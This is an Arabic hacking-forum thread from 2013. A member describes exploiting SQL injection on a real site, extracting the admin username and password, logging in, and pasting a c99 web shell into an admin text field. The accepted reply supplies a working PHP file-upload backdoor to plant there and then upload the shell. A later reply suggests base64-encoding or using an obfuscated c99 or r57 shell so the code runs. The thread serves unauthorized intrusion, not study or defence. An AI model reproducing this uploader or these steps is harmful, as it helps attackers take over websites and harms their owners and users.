التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة [حل مشكلة] دمج xss مع sql الرجاء الدخول مبتدا او محترف
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-20-2013, 05:38 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية hisokaosomaki
 

 
 
إحصائية العضو






hisokaosomaki غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hisokaosomaki is on a distinguished road
مطلوب مجاب: دمج xss مع sql الرجاء الدخول مبتدا او محترف

السلام عليكم

البارح بينما كنت ابحث في المواقع المصابة بثغرات sql
وجدت احد المواقع المصابة وبعد سحب اليوزر والباس من قاعدة البيانات و الدخول بحساب الادمين
بحثت كالعادة عن مركز تحميل ملفات فلم اجد
كل ما وجدته كان <textaera> اي ان قالب الصفحة موجود مع مكان لادخال نصوص
مفهوم ؟؟
المهم قلت اجرب كود جافا سكريبت و كانني ابحث عن ثغرة xss وضعت الكود فاشتغل
مفهوم ؟
المهم قلت لمادا لااضع الشل كاملا فهو في الاساس ليس الا اكواد php\
فتحت شل c99 بالمفكرة و عملت copy و لصقت كود الشل في مكان ادخال النصوص
ما رايكم هل اشتغل ؟


الاجابة هي نعم و لا
اشتغل و لكن في شكل ازرار مبعثرة و مخربطة في كافة ارجاء الصفحة
السوال هل يمكن استعمال هده الطريقة فعلا في حقن الشل و كيف ؟؟؟



Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC ]l[ xss lu sql hgv[hx hg]o,g lfj]h h, lpjvt

   

رد مع اقتباس
أفضل جواب - كتبه MaFia
احذف كود الشل من لوحة التحكم
وهذا كود ابلود هيشتغل معاك ان شاء الله

كود:
<b>ApendiX</b>
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; }
    else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>
وبعدها ارفع شيلك منه
قديم 08-22-2013, 12:47 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 
 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road
افتراضي رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف

احذف كود الشل من لوحة التحكم
وهذا كود ابلود هيشتغل معاك ان شاء الله

كود:
<b>ApendiX</b>
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; }
    else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>
وبعدها ارفع شيلك منه
التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

رد مع اقتباس
قديم 08-22-2013, 02:34 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية hisokaosomaki
 

 
 
إحصائية العضو






hisokaosomaki غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hisokaosomaki is on a distinguished road
افتراضي رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف

اقتباس
احذف كود الشل من لوحة التحكم
وهذا كود ابلود هيشتغل معاك ان شاء الله

للاسف لم تشتغل ظهر هادا ا
ApendiX
echo '
'.php_uname().'
';
echo '';
echo '';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Done The Work!!!

'; }
else { echo 'Upload Failed!

'; }
}
?>

   

رد مع اقتباس
قديم 08-22-2013, 11:43 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 
 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road
افتراضي رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف

جرب تشفر الكود
base64

او شوف شل غير c99 او r57
يكون مشفر

وان شاء الله هيشتغل معاك

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 11:06 AM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0